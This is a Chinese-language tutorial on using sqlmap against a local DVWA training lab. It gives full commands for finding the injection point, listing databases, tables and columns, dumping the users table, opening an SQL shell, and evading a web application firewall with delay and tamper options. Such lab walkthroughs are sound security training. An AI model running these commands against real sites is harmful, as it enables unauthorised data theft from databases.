Sqlmap自动化注入工具

1、安装PHP集成环境
安装phpstudy
2、安装DVWA
C:\phpStudy\PHPTutorial\WWW目录下解压
Sqlmap自动化注入工具_第1张图片
$_DVWA[ ‘db_password’ ] = ‘root’;
Sqlmap自动化注入工具_第2张图片
admin:password
Sqlmap自动化注入工具_第3张图片
输入信息
Sqlmap自动化注入工具_第4张图片
3、设置代理开始抓包
Sqlmap自动化注入工具_第5张图片
4、开始探测
扫描语句
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233&Submit=Submit#”
加cookies
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2”
扫描等级
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2” --level=3
基于文件列表
sqlmap -m list.txt
不使用缓存
–flush-session
探测数据库名
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233*&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2” --level=3 --dbs
Sqlmap自动化注入工具_第6张图片
探测数据库表名
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233*&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2” --level=3 -D dvwa --tables
在这里插入图片描述
探测数据库列表名
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233*&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2” --level=3 -D dvwa -T users --columns
Sqlmap自动化注入工具_第7张图片
探测数据库数据
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233*&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2” --level=3 -D dvwa -T users --dump
在这里插入图片描述
–technique B E U S T
Boolean-based blind #基于布尔
Error-based #基于错误
Union query-based #基于联合查询
Stacked queries(对文件系统、操作系统、注册表操作时,必须指定该方式) #堆叠查询
Time-based blind #基于时间
所有
-a
通过代理
–proxy=“http://1.1.1.1:8080”
动态
–random-agent
sql命令行
–sql-shell
Sqlmap自动化注入工具_第8张图片
exit #退出
5、提升等级
Sqlmap自动化注入工具_第9张图片
Sqlmap自动化注入工具_第10张图片
Sqlmap自动化注入工具_第11张图片
sqlmap -r 1.txt

Sqlmap自动化注入工具_第12张图片
6、绕过waf的一些参数:
-delay 每次http(s)请求之间延迟时间,浮点数,单位为秒,默认无延迟
-timeout 请求超时时间,浮点数,默认为30秒
-retries http(s)连接超时重试次数,默认3次
-randomize 长度、类型与原始值保持一致的前提下,指定每次请求随机取值的参数
http://192.168.1.1/?id=100 –randomize(id)
–tamper 发送数据混淆脚本(类似于编码) 脚本位置 /usr/share/sqlmap/tamper/
Sqlmap自动化注入工具_第13张图片

你可能感兴趣的:(网络安全)